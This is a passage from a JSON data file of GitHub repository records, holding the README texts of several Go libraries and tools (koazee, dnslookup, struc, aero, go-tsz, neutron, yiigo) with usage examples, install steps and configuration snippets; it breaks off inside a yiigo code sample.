\")\n\tfmt.Println(stream.RemoveDuplicates().Out().Val())\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey dog fox tiger lion]\nstream.Take(1,4): [dog cat monkey dog]\nstream.Filter(len==4): [lynx lion]\nstream.RemoveDuplicates(): [lynx dog cat monkey fox tiger lion]\n*/\n```\n##### stream.GroupBy\nThis operation creates groups depending on the returned function value\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. 
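A minimal sketch of that error-returning variant, based only on the sentence above (the empty-string check and the error value are illustrative and not part of the upstream examples):\n\n```go\npackage main\n\nimport (\n\t\"errors\"\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tstream := koazee.StreamOf(animals)\n\t// The grouping function may also return an error as its second value;\n\t// returning a non-nil error stops processing of the stream.\n\tout, _ := stream.GroupBy(func(val string) (int, error) {\n\t\tif val == \"\" {\n\t\t\treturn 0, errors.New(\"unexpected empty value\")\n\t\t}\n\t\treturn len(val), nil\n\t})\n\tfmt.Println(out)\n}\n```\n\n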
The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", animals)\n\tstream := koazee.StreamOf(animals)\n\tfmt.Print(\"stream.GroupBy(strings.Len): \")\n\tout, _ := stream.GroupBy(func(val string)int{return len(val)})\n\tfmt.Println(out)\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey dog fox tiger lion]\nstream.GroupBy(strings.Len): map[5:[tiger] 4:[lynx lion] 3:[dog cat dog fox] 6:[monkey]]\n*/\n```\n\n\n##### stream.Map\nThis operation performs a modification over all the elements in the stream.\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\nvar animals = []string{\"lynx\", \"dog\", \"cat\", \"monkey\", \"dog\", \"fox\", \"tiger\", \"lion\"}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", animals)\n\tstream := koazee.StreamOf(animals)\n\tfmt.Print(\"stream.Map(strings.Title): \")\n\tfmt.Println(stream.Map(strings.Title).Do().Out().Val())\n}\n\n/**\ngo run main.go\n\ninput: [lynx dog cat monkey dog fox tiger lion]\nstream.Map(strings.Title): [Lynx Dog Cat Monkey Dog Fox Tiger Lion]\n*/\n```\n\n##### stream.Reduce\nThis operation give us a single output after iterating over the elements in the stream.\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\nvar numbers = []int{1, 5, 4, 3, 2, 7, 1, 8, 2, 3}\n\nfunc main() {\n\tfmt.Printf(\"input: %v\\n\", numbers)\n\tstream := koazee.StreamOf(numbers)\n\tfmt.Print(\"stream.Reduce(sum): \")\n\tfmt.Println(stream.Reduce(func(acc, val int) int {\n\t\treturn acc + val\n\t}).Int())\n}\n\n/**\ngo run main.go\n\ninput: [1 5 4 3 2 7 1 8 2 3]\nstream.Reduce(sum): 36\n*/\n```\n\n##### stream.ForEach\nThis operation iterates over the element in the stream.\n\nYou can now optionally return an error as the second parameter to stop processing of the stream. The error will be available in `stream.Out().Err().UserError()`.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n)\n\ntype message struct {\n\tuser string\n\tmessage string\n}\n\nvar messages = []*message{\n\t{user: \"John\", message: \"Hello Jane\"},\n\t{user: \"Jane\", message: \"Hey John, how are you?\"},\n\t{user: \"John\", message: \"I'm fine! and you?\"},\n\t{user: \"Jane\", message: \"Me too\"},\n}\n\nfunc main() {\n\n\tstream := koazee.StreamOf(messages)\n\tstream.ForEach(func(m *message) {\n\t\tfmt.Printf(\"%s: \\\"%s\\\"\\n\", m.user, m.message)\n\t}).Do()\n}\n\n/**\ngo run main.go\n\nJohn: \"Hello Jane\"\nJane: \"Hey John, how are you?\"\nJohn: \"I'm fine! 
and you?\"\nJane: \"Me too\"\n*/\n```\n\n#### Combine operations and evaluate them lazily\nThe main goal of Koazee is providing a set of operations that can be combined and being evaluated lazily.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/wesovilabs/koazee\"\n\t\"strings\"\n)\n\ntype Person struct {\n\tName string\n\tMale bool\n\tAge int\n}\n\nvar people = []*Person{\n\t{\"John Smith\", true, 32},\n\t{\"Peter Pan\", true, 17},\n\t{\"Jane Doe\", false, 20},\n\t{\"Anna Wallace\", false, 35},\n\t{\"Tim O'Brian\", true, 13},\n\t{\"Celia Hills\", false, 15},\n}\n\nfunc main() {\n\tstream := koazee.\n\t\tStreamOf(people).\n\t\tFilter(func(person *Person) bool {\n\t\t\treturn !person.Male\n\t\t}).\n\t\tSort(func(person, otherPerson *Person) int {\n\t\t\treturn strings.Compare(person.Name, otherPerson.Name)\n\t\t}).\n\t\tForEach(func(person *Person) {\n\t\t\tfmt.Printf(\"%s is %d years old\\n\", person.Name, person.Age)\n\t\t})\n\n\tfmt.Println(\"Operations are not evaluated until we perform stream.Do()\\n\")\n\tstream.Do()\n}\n\n/**\ngo run main.go\n\nOperations are not evaluated until we perform stream.Do()\n\nAnna Wallace is 35 years old\nCelia Hills is 15 years old\nJane Doe is 20 years old\n */\n```\n\n## Available Operations\n\n| Operation | Description | Since |\n|---|---|---|\n| Add | It adds a new element in the last position | v0.0.1 |\n| At | It returns the element in the given position | v0.0.1 |\n| Contains | It checks if the given element is found in the stream.| v0.0.1 |\n| Count | It returns the number of elements in a stream| v0.0.1 |\n| DeleteAt| It remove the elements in the given position | v0.0.3 |\n| Drop | It removes an element from the stream | v0.0.1 |\n| DropWhile | It removes the elements in the stream that match with the given input function | v0.0.4 |\n| Filter | It discards those elements that doesn't match with the provided filter| v0.0.1 |\n| First | It returns the element in the first position | v0.0.1 |\n| ForEach | It does something over all the elements in the stream.| v0.0.1 |\n| GroupBy | It creates groups depending on the returned function value| v0.0.4 |\n| IndexOf | It returns the first index of the element in the stream.| v0.0.3 |\n| IndexesOf | It returns the index for all the occurrences of the element in the stream.| v0.0.4 |\n| Last | It returns the element in the last position | v0.0.1 |\n| LastIndexOf | It returns the last occurrence for the element in the stream.| v0.0.3 |\n| Map | It converts the element in the stream | v0.0.1 |\n| Pop | It extracts the first element in the stream and return this and the new stream | v0.0.3 |\n| Reduce | It reduceshe stream to a single value by executing a provided function for each value of the stream| v0.0.1 |\n| RemoveDuplicates | It removes duplicated elements.| v0.0.1 |\n| Reverse| It reverses the sequence of elements in the stream.| v0.0.3 |\n| Set | It replaces the element in the given index by the provided value | v0.0.3 |\n| Sort | It sorts the elements in the stream| v0.0.1 |\n| Take | It returns a stream with the elements between the given indexes | v0.0.3 |\n\n## Samples\n\nA rich and growing set of examples can be found on [koazee-samples](https://github.com/wesovilabs/koazee-samples)\n\n## Benchmark\n\nYou can check the Benchmark for the Koazee operations [here](https://github.com/wesovilabs/koazee/wiki/Benchmark-Report)\n\nA benchmark comparison with other frameworks can be found in [Koazee vs Go-Funk vs 
Go-Linq](https://medium.com/@ivan.corrales.solera/koazee-vs-go-funk-vs-go-linq-caf8ef18584e)\n\n## Guides & Tutorials\n\n[Shopping cart with Koazee](https://medium.com/wesovilabs/koazee-the-shopping-cart-a381bba32955)\n\n\n## Roadmap\n\nThis is only the beginning! By the way, If you missed any operation in Koazee v0.0.3, or you found a bug, please [create a new issue on Github or vote the existing ones](https://github.com/wesovilabs/koazee/issues)!\n\n\n## Contributors\n- [@ivancorrales](https://github.com/ivancorrales)\n- [@xuyz](https://github.com/xuyz)\n- [@u5surf](https://github.com/u5surf)\n- [@flowonyx](https://github.com/flowonyx)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ameshkov/dnslookup", "link": "https://github.com/ameshkov/dnslookup", "tags": [], "stars": 514, "description": "Simple command line utility to make DNS lookups to the specified server", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/github.com/ameshkov/dnslookup)](https://goreportcard.com/report/ameshkov/dnslookup)\n[![Latest release](https://img.shields.io/github/release/ameshkov/dnslookup/all.svg)](https://github.com/ameshkov/dnslookup/releases)\n[![Snap Store](https://snapcraft.io/dnslookup/badge.svg)](https://snapcraft.io/dnslookup)\n\n# dnslookup\n\nSimple command line utility to make DNS lookups. Supports all known DNS protocols: plain DNS, DoH, DoT, DoQ, DNSCrypt.\n\n### How to install\n\n* Using homebrew:\n ```\n brew install ameshkov/tap/dnslookup\n ```\n* From source:\n ```\n go install github.com/ameshkov/dnslookup@latest\n ```\n* You can get a binary from the [releases page](https://github.com/ameshkov/dnslookup/releases).\n* You can install it from the [Snap Store](https://snapcraft.io/dnslookup)\n\n### Examples:\n\nPlain DNS:\n```\n./dnslookup example.org 94.140.14.14\n```\n\nDNS-over-TLS:\n```\n./dnslookup example.org tls://dns.adguard.com\n```\n\nDNS-over-TLS with IP:\n```\n./dnslookup example.org tls://dns.adguard.com 94.140.14.14\n```\n\nDNS-over-HTTPS with HTTP/2:\n```\n./dnslookup example.org https://dns.adguard.com/dns-query\n```\n\nDNS-over-HTTPS with HTTP/3 support (the version is chosen automatically):\n```\nHTTP3=1 ./dnslookup example.org https://dns.google/dns-query\n```\n\nDNS-over-HTTPS forcing HTTP/3 only:\n```\n./dnslookup example.org h3://dns.google/dns-query\n```\n\nDNS-over-HTTPS with IP:\n```\n./dnslookup example.org https://dns.adguard.com/dns-query 94.140.14.14\n```\n\nDNSCrypt (stamp):\n```\n./dnslookup example.org sdns://AQIAAAAAAAAAFDE3Ni4xMDMuMTMwLjEzMDo1NDQzINErR_JS3PLCu_iZEIbq95zkSV2LFsigxDIuUso_OQhzIjIuZG5zY3J5cHQuZGVmYXVsdC5uczEuYWRndWFyZC5jb20\n```\n\nDNSCrypt (parameters):\n```\n./dnslookup example.org 176.103.130.130:5443 2.dnscrypt.default.ns1.adguard.com D12B:47F2:52DC:F2C2:BBF8:9910:86EA:F79C:E449:5D8B:16C8:A0C4:322E:52CA:3F39:0873\n```\n\nDNS-over-QUIC (experimental, uses port 784):\n```\n./dnslookup example.org quic://dns.adguard.com\n```\n\nMachine-readable format:\n```\nJSON=1 ./dnslookup example.org 94.140.14.14\n```\n\nDisable certificates verification:\n```\nVERIFY=0 ./dnslookup example.org tls://127.0.0.1\n```\n\nSpecify the type of resource record (default A):\n```\nRRTYPE=AAAA ./dnslookup example.org tls://127.0.0.1\nRRTYPE=HTTPS ./dnslookup example.org tls://127.0.0.1\n```\n\nSpecify the class of query (default IN):\n```\nCLASS=CH ./dnslookup example.org tls://127.0.0.1\n```\n\nAdd EDNS0 Padding:\n```\nPAD=1 ./dnslookup 
example.org tls://127.0.0.1\n```\n\nVerbose-level logging:\n```shell\nVERBOSE=1 ./dnslookup example.org tls://dns.adguard.com\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lunixbochs/struc", "link": "https://github.com/lunixbochs/struc", "tags": [], "stars": 514, "description": "Better binary packing for Go", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/lunixbochs/struc.svg?branch=master)](https://travis-ci.org/lunixbochs/struc) [![GoDoc](https://godoc.org/github.com/lunixbochs/struc?status.svg)](https://godoc.org/github.com/lunixbochs/struc)\n\nstruc\n====\n\nStruc exists to pack and unpack C-style structures from bytes, which is useful for binary files and network protocols. It could be considered an alternative to `encoding/binary`, which requires massive boilerplate for some similar operations.\n\nTake a look at an [example comparing `struc` and `encoding/binary`](https://bochs.info/p/cxvm9)\n\nStruc considers usability first. That said, it does cache reflection data and aims to be competitive with `encoding/binary` struct packing in every way, including performance.\n\nExample struct\n----\n\n```Go\ntype Example struct {\n Var int `struc:\"int32,sizeof=Str\"`\n Str string\n Weird []byte `struc:\"[8]int64\"`\n Var []int `struc:\"[]int32,little\"`\n}\n```\n\nStruct tag format\n----\n\n - ```Var []int `struc:\"[]int32,little,sizeof=StringField\"` ``` will pack Var as a slice of little-endian int32, and link it as the size of `StringField`.\n - `sizeof=`: Indicates this field is a number used to track the length of a another field. `sizeof` fields are automatically updated on `Pack()` based on the current length of the tracked field, and are used to size the target field during `Unpack()`.\n - Bare values will be parsed as type and endianness.\n\nEndian formats\n----\n\n - `big` (default)\n - `little`\n\nRecognized types\n----\n\n - `pad` - this type ignores field contents and is backed by a `[length]byte` containing nulls\n - `bool`\n - `byte`\n - `int8`, `uint8`\n - `int16`, `uint16`\n - `int32`, `uint32`\n - `int64`, `uint64`\n - `float32`\n - `float64`\n\nTypes can be indicated as arrays/slices using `[]` syntax. Example: `[]int64`, `[8]int32`.\n\nBare slice types (those with no `[size]`) must have a linked `Sizeof` field.\n\nPrivate fields are ignored when packing and unpacking.\n\nExample code\n----\n\n```Go\npackage main\n\nimport (\n \"bytes\"\n \"github.com/lunixbochs/struc\"\n)\n\ntype Example struct {\n A int `struc:\"big\"`\n\n // B will be encoded/decoded as a 16-bit int (a \"short\")\n // but is stored as a native int in the struct\n B int `struc:\"int16\"`\n\n // the sizeof key links a buffer's size to any int field\n Size int `struc:\"int8,little,sizeof=Str\"`\n Str string\n\n // you can get freaky if you want\n Str2 string `struc:\"[5]int64\"`\n}\n\nfunc main() {\n var buf bytes.Buffer\n t := &Example{1, 2, 0, \"test\", \"test2\"}\n err := struc.Pack(&buf, t)\n o := &Example{}\n err = struc.Unpack(&buf, o)\n}\n```\n\nBenchmark\n----\n\n`BenchmarkEncode` uses struc. `Stdlib` benchmarks use equivalent `encoding/binary` code. 
`Manual` encodes without any reflection, and should be considered an upper bound on performance (which generated code based on struc definitions should be able to achieve).\n\n```\nBenchmarkEncode 1000000 1265 ns/op\nBenchmarkStdlibEncode 1000000 1855 ns/op\nBenchmarkManualEncode 5000000 284 ns/op\nBenchmarkDecode 1000000 1259 ns/op\nBenchmarkStdlibDecode 1000000 1656 ns/op\nBenchmarkManualDecode 20000000 89.0 ns/op\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "aerogo/aero", "link": "https://github.com/aerogo/aero", "tags": ["go", "web", "server", "high-performance"], "stars": 514, "description": ":bullettrain_side: High-performance web server for Go.", "lang": "Go", "repo_lang": "", "readme": "![Aero Go Logo](docs/media/aero.go.png)\n\n{go:header}\n\nAero is a high-performance web server with a clean API.\n\n{go:install}\n\n## Benchmarks\n\n[![Web server performance](docs/media/server-performance.png)](docs/Benchmarks.md)\n\n## Features\n\n- HTTP/2\n- Radix tree routing\n- Low latency\n- Bandwidth savings via automated ETags\n- Session data with custom stores\n- Server-sent events\n- Context interface for custom contexts\n\n## Links\n\n- [API](docs/API.md)\n- [Configuration](docs/Configuration.md)\n- [Benchmarks](docs/Benchmarks.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dgryski/go-tsz", "link": "https://github.com/dgryski/go-tsz", "tags": [], "stars": 514, "description": "Time series compression algorithm from Facebook's Gorilla paper", "lang": "Go", "repo_lang": "", "readme": "# go-tsz\n\n* Package tsz implement time-series compression http://www.vldb.org/pvldb/vol8/p1816-teller.pdf in Go*\n\n[![Master Branch](https://img.shields.io/badge/branch-master-lightgray.svg)](https://github.com/dgryski/go-tsz/tree/master)\n[![Master Build Status](https://secure.travis-ci.org/dgryski/go-tsz.svg?branch=master)](https://travis-ci.org/dgryski/go-tsz?branch=master)\n[![Master Coverage Status](https://coveralls.io/repos/dgryski/go-tsz/badge.svg?branch=master&service=github)](https://coveralls.io/github/dgryski/go-tsz?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/dgryski/go-tsz)](https://goreportcard.com/report/github.com/dgryski/go-tsz)\n[![GoDoc](https://godoc.org/github.com/dgryski/go-tsz?status.svg)](http://godoc.org/github.com/dgryski/go-tsz)\n\n## Description\n \nPackage tsz implement the Gorilla Time Series Databasetime-series compression as described in:\nhttp://www.vldb.org/pvldb/vol8/p1816-teller.pdf\n\n\n## Getting started\n\nThis application is written in Go language, please refer to the guides in https://golang.org for getting started.\n\nThis project include a Makefile that allows you to test and build the project with simple commands.\nTo see all available options:\n```bash\nmake help\n```\n\n## Running all tests\n\nBefore committing the code, please check if it passes all tests using\n```bash\nmake qa\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emersion/neutron", "link": "https://github.com/emersion/neutron", "tags": ["protonmail", "imap", "webmail", "smtp", "mail"], "stars": 514, "description": "Self-hosted server for the ProtonMail client", "lang": "Go", "repo_lang": "", "readme": "# neutron\n\n[![Build 
Status](https://travis-ci.org/emersion/neutron.svg?branch=master)](https://travis-ci.org/emersion/neutron)\n[![GoDoc](https://godoc.org/github.com/emersion/neutron?status.svg)](https://godoc.org/github.com/emersion/neutron)\n\nSelf-hosted server for [Protonmail client](https://github.com/ProtonMail/WebClient).\n\n> This project is not affiliated or supported by ProtonMail.\n\n## What is it?\n\nNeutron is a server that will allow the ProtonMail client to be used with\n_backends_. Several backends are available right now:\n* IMAP: this will read and store messages on your IMAP server. Received messages\n will stay as is (that is, unencrypted) but messages saved from the web client\n will be encrypted. You will login to the web client with your IMAP username\n and password.\n* SMTP: this will send messages using your SMTP server. Messages are sent\n encrypted to the server. If a recipient's public key is not found, the server\n will decrypt the message before sending it to this recipient.\n* Filesystem: settings, contacts, keys are stored on disk. Keys are always\n stored encrypted.\n* Memory: all is stored in memory and will be destroyed when the server is\n stopped.\n\nNeutron is modular so it's easy to create new backends and handle more scenarios.\n\nKeep in mind that Neutron is less secure than ProtonMail: most servers don't\nuse full-disk encryption and aren't under 1,000 meters of granite rock in\nSwitzerland. Also, SRP is not yet supported ([#35](https://github.com/emersion/neutron/issues/35)).\nIf you use Neutron, make sure to [donate to ProtonMail](https://protonmail.com/donate)!\n\n## Install\n\n* Debian, Ubuntu & Fedora: ~~install from https://packager.io/gh/emersion/neutron\n and run with `neutronmail run web`~~\n* Other platforms: no packages yet, you'll have to build from source (see below)\n\n### Configuration\n\nSee `config.json`. 
You'll have to change IMAP and SMTP settings to match your\nmail server config.\n\n```js\n{\n\t\"Memory\": {\n\t\t\"Enabled\": true,\n\t\t\"Populate\": false, // Populate server with default neutron user\n\t\t\"Domains\": [\"emersion.fr\"] // Available e-mail domains\n\t},\n\t\"Imap\": { // IMAP server config\n\t\t\"Enabled\": true,\n\t\t\"Hostname\": \"mail.gandi.net\",\n\t\t\"Tls\": true,\n\t\t\"Suffix\": \"@emersion.fr\" // Will be appended to username when authenticating\n\t},\n\t\"Smtp\": { // SMTP server config\n\t\t\"Enabled\": true,\n\t\t\"Hostname\": \"mail.gandi.net\",\n\t\t\"Port\": 587,\n\t\t\"Suffix\": \"@emersion.fr\" // Will be appended to username when authenticating\n\t},\n\t\"Disk\": { // Store keys, contacts and settings on disk\n\t\t\"Enabled\": true,\n\t\t\"Keys\": { \"Directory\": \"db/keys\" }, // PGP keys location\n\t\t\"Contacts\": { \"Directory\": \"db/contacts\" },\n\t\t\"UsersSettings\": { \"Directory\": \"db/settings\" },\n\t\t\"Addresses\": { \"Directory\": \"db/addresses\" }\n\t}\n}\n```\n\n### Usage\n\nTo generate keys for a new user the first time, just click _Sign up_ on the\nlogin page and enter your IMAP credentials.\n\n### Options\n\n* `-config`: specify a custom config file\n* `-help`: show help\n\n## Build\n\nRequirements:\n* Go (to build the server)\n* Node, NPM (to build the client)\n\n```shell\n# Get the code\ngo get -u github.com/emersion/neutron\ncd $GOPATH/src/github.com/emersion/neutron\n\n# Build the client\ngit submodule init\ngit submodule update\nmake build-client\n\n# Start the server\nmake start\n```\n\n### Docker\n\n```shell\nmake build-docker\ndocker build -t neutron .\ndocker create -p 4000:4000 -v $PWD/config.json:/config.json -v $PWD/db:/db neutron\n```\n\n## Backends\n\nAll backends must implement the [backend interface](https://github.com/emersion/neutron/blob/master/backend/backend.go).\nThe main backend interface is split into multiple other backend interfaces for\ndifferent roles: `ContactsBackend`, `LabelsBackend` and so on. This allows to\nbuild modular backends, e.g. a `MessagesBackend` which stores messages on an\nIMAP server with a `ContactsBackend` which stores contacts on a LDAP server and\na `SendBackend` which sends outgoing messages to a SMTP server.\n\nWriting a backend is just a matter of implementing the necessary functions. You\ncan read the [`memory` backend](https://github.com/emersion/neutron/tree/master/backend/memory)\nto understand how to do that. 
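As a rough illustration of the idea only (the type and method below are hypothetical, not neutron's actual `ContactsBackend` interface, which is defined in `backend/backend.go`), a custom backend is simply a type whose methods satisfy the relevant interface:\n\n```go\n// ldapContacts sketches a contacts backend backed by an LDAP server.\n// Method names here are invented for illustration; implement the real\n// interface from the backend package instead.\ntype ldapContacts struct {\n\turl string\n}\n\nfunc (b *ldapContacts) ListContacts(user string) ([]string, error) {\n\t// query LDAP here and map the results to neutron's contact type\n\treturn []string{\"alice@example.org\"}, nil\n}\n```\n\n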
Docs for the backend are available here:\nhttps://godoc.org/github.com/emersion/neutron/backend#Backend\n\n## License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "shenghui0779/yiigo", "link": "https://github.com/shenghui0779/yiigo", "tags": ["yiigo", "go", "golang", "framework", "sql-builder", "grpc-pool", "mongodb", "mysql", "redis", "dotenv", "logger", "nsq", "db", "location"], "stars": 513, "description": "\ud83d\udd25 \u4e00\u4e2a\u597d\u7528\u7684\u8f7b\u91cf\u7ea7 Go \u5f00\u53d1\u901a\u7528\u5e93 \ud83d\ude80\ud83d\ude80\ud83d\ude80", "lang": "Go", "repo_lang": "", "readme": "# yiigo\n\n[![golang](https://img.shields.io/badge/Language-Go-green.svg?style=flat)](https://golang.org) [![GitHub release](https://img.shields.io/github/release/shenghui0779/yiigo.svg)](https://github.com/shenghui0779/yiigo/releases/latest) [![pkg.go.dev](https://img.shields.io/badge/dev-reference-007d9c?logo=go&logoColor=white&style=flat)](https://pkg.go.dev/github.com/shenghui0779/yiigo) [![Apache 2.0 license](http://img.shields.io/badge/license-Apache%202.0-brightgreen.svg)](http://opensource.org/licenses/apache2.0)\n\n\u4e00\u4e2a\u597d\u7528\u7684\u8f7b\u91cf\u7ea7 Go \u5f00\u53d1\u901a\u7528\u5e93\u3002\u5982\u679c\u4f60\u4e0d\u559c\u6b22\u8fc7\u5ea6\u5c01\u88c5\u7684\u91cd\u91cf\u7ea7\u6846\u67b6\uff0c\u8fd9\u4e2a\u5e93\u53ef\u80fd\u662f\u4e2a\u4e0d\u9519\u7684\u9009\u62e9 \ud83d\ude0a\n\n## Features\n\n- \u652f\u6301 [MySQL](https://github.com/go-sql-driver/mysql)\n- \u652f\u6301 [PostgreSQL](https://github.com/jackc/pgx)\n- \u652f\u6301 [SQLite3](https://github.com/mattn/go-sqlite3)\n- \u652f\u6301 [MongoDB](https://github.com/mongodb/mongo-go-driver)\n- \u652f\u6301 [Redis](https://github.com/gomodule/redigo)\n- \u652f\u6301 [NSQ](https://github.com/nsqio/go-nsq)\n- SQL\u4f7f\u7528 [sqlx](https://github.com/jmoiron/sqlx)\n- ORM\u63a8\u8350 [ent](https://github.com/ent/ent)\n- \u65e5\u5fd7\u4f7f\u7528 [zap](https://github.com/uber-go/zap)\n- \u914d\u7f6e\u4f7f\u7528 [dotenv](https://github.com/joho/godotenv)\uff0c\u652f\u6301\uff08\u5305\u62ec k8s configmap\uff09\u70ed\u52a0\u8f7d\n- \u5176\u4ed6\n - \u8f7b\u91cf\u7684 SQL Builder\n - \u57fa\u4e8e Redis \u7684\u7b80\u5355\u5206\u5e03\u5f0f\u9501\n - Websocket \u7b80\u5355\u4f7f\u7528\u5c01\u88c5\uff08\u652f\u6301\u6388\u6743\u6821\u9a8c\uff09\n - \u7b80\u6613\u7684\u5355\u65f6\u95f4\u8f6e\uff08\u652f\u6301\u4e00\u6b21\u6027\u548c\u591a\u6b21\u91cd\u8bd5\u4efb\u52a1\uff09\n - \u5b9e\u7528\u7684\u8f85\u52a9\u65b9\u6cd5\uff0c\u5305\u542b\uff1ahttp\u3001cypto\u3001date\u3001IP\u3001validator\u3001version compare \u7b49\n\n## Installation\n\n```sh\ngo get -u github.com/shenghui0779/yiigo\n```\n\n## Usage\n\n#### ENV\n\n- load\n\n```go\n// \u9ed8\u8ba4\u52a0\u8f7d\u5f53\u524d\u76ee\u5f55\u4e0b\u7684`.env`\u6587\u4ef6\nyiigo.LoadEnv()\n\n// \u52a0\u8f7d\u6307\u5b9a\u914d\u7f6e\u6587\u4ef6\nyiigo.LoadEnv(yiigo.WithEnvFile(\"mycfg.env\"))\n\n// \u70ed\u52a0\u8f7d\nyiigo.LoadEnv(yiigo.WithEnvWatcher(func(e fsnotify.Event) {\n fmt.Println(e.String())\n}))\n```\n\n- `.env`\n\n```sh\nENV=dev\n```\n\n- usage\n\n```go\nfmt.Println(os.Getenv(\"ENV\"))\n// output: dev\n```\n\n#### DB\n\n- register\n\n```go\nyiigo.Init(\n yiigo.WithMySQL(yiigo.Default, &yiigo.DBConfig{\n DSN: \"dsn\",\n Options: &yiigo.DBOptions{\n MaxOpenConns: 20,\n MaxIdleConns: 10,\n ConnMaxLifetime: 10 * time.Minute,\n ConnMaxIdleTime: 5 * time.Minute,\n },\n }),\n\n yiigo.WithMySQL(\"other\", 
&yiigo.DBConfig{\n DSN: \"dsn\",\n Options: &yiigo.DBOptions{\n MaxOpenConns: 20,\n MaxIdleConns: 10,\n ConnMaxLifetime: 10 * time.Minute,\n ConnMaxIdleTime: 5 * time.Minute,\n },\n }),\n)\n```\n\n- sqlx\n\n```go\n// default db\nyiigo.DB().Get(&User{}, \"SELECT * FROM user WHERE id = ?\", 1)\n\n// other db\nyiigo.DB(\"other\").Get(&User{}, \"SELECT * FROM user WHERE id = ?\", 1)\n```\n\n- ent\n\n```go\nimport \"/ent\"\n\n// default driver\nclient := ent.NewClient(ent.Driver(yiigo.EntDriver()))\n\n// other driver\nclient := ent.NewClient(ent.Driver(yiigo.EntDriver(\"other\")))\n```\n\n#### MongoDB\n\n```go\n// register\nyiigo.Init(\n yiigo.WithMongo(yiigo.Default, \"dsn\"),\n yiigo.WithMongo(\"other\", \"dsn\"),\n)\n\n// default mongodb\nyiigo.Mongo().Database(\"test\").Collection(\"numbers\").InsertOne(context.Background(), bson.M{\"name\": \"pi\", \"value\": 3.14159})\n\n// other mongodb\nyiigo.Mongo(\"other\").Database(\"test\").Collection(\"numbers\").InsertOne(context.Background(), bson.M{\"name\": \"pi\", \"value\": 3.14159})\n```\n\n#### Redis\n\n```go\n// register\nyiigo.Init(\n yiigo.WithRedis(yiigo.Default, &yiigo.RedisConfig{\n Addr: \"addr\",\n Options: &yiigo.RedisOptions{\n ConnTimeout: 10 * time.Second,\n ReadTimeout: 10 * time.Second,\n WriteTimeout: 10 * time.Second,\n PoolSize: 10,\n IdleTimeout: 5 * time.Minute,\n },\n }),\n\n yiigo.WithRedis(\"other\", &yiigo.RedisConfig{\n Addr: \"addr\",\n Options: &yiigo.RedisOptions{\n ConnTimeout: 10 * time.Second,\n ReadTimeout: 10 * time.Second,\n WriteTimeout: 10 * time.Second,\n PoolSize: 10,\n IdleTimeout: 5 * time.Minute,\n },\n }),\n)\n\n// default redis\nyiigo.Redis().Do(context.Background(), \"SET\", \"test_key\", \"hello world\")\n\nyiigo.Redis().DoFunc(context.Background(), func(ctx context.Context, conn *RedisConn) error {\n if _, err := conn.Do(\"SET\", \"key1\", \"hello\"); err != nil {\n return err\n }\n\n if _, err := conn.Do(\"SET\", \"key2\", \"world\"); err != nil {\n return err\n }\n\n return nil\n})\n\n// other redis\nyiigo.Redis(\"other\").Do(context.Background(), \"SET\", \"test_key\", \"hello world\")\n\nyiigo.Redis(\"other\").DoFunc(context.Background(), func(ctx context.Context, conn *RedisConn) error {\n if _, err := conn.Do(\"SET\", \"key1\", \"hello\"); err != nil {\n return err\n }\n\n if _, err := conn.Do(\"SET\", \"key2\", \"world\"); err != nil {\n return err\n }\n\n return nil\n})\n```\n\n#### Logger\n\n```go\n// register\nyiigo.Init(\n yiigo.WithLogger(yiigo.Default, yiigo.LoggerConfig{\n Filename: \"filename\",\n Options: &yiigo.LoggerOptions{\n Stderr: true,\n },\n }),\n\n yiigo.WithLogger(\"other\", yiigo.LoggerConfig{\n Filename: \"filename\",\n Options: &yiigo.LoggerOptions{\n Stderr: true,\n },\n }),\n)\n\n// default logger\nyiigo.Logger().Info(\"hello world\")\n\n// other logger\nyiigo.Logger(\"other\").Info(\"hello world\")\n```\n\n#### HTTP\n\n```go\n// default client\nyiigo.HTTPGet(context.Background(), \"URL\")\n\n// new client\nclient := yiigo.NewHTTPClient(*http.Client)\nclient.Do(context.Background(), http.MethodGet, \"URL\", nil)\n\n// upload\nform := yiigo.NewUploadForm(\n yiigo.WithFormField(\"title\", \"TITLE\"),\n yiigo.WithFormField(\"description\", \"DESCRIPTION\"),\n yiigo.WithFormFile(\"media\", \"demo.mp4\", func(w io.Writer) error {\n f, err := os.Open(\"demo.mp4\")\n\n if err != nil {\n return err\n }\n\n defer f.Close()\n\n if _, err = 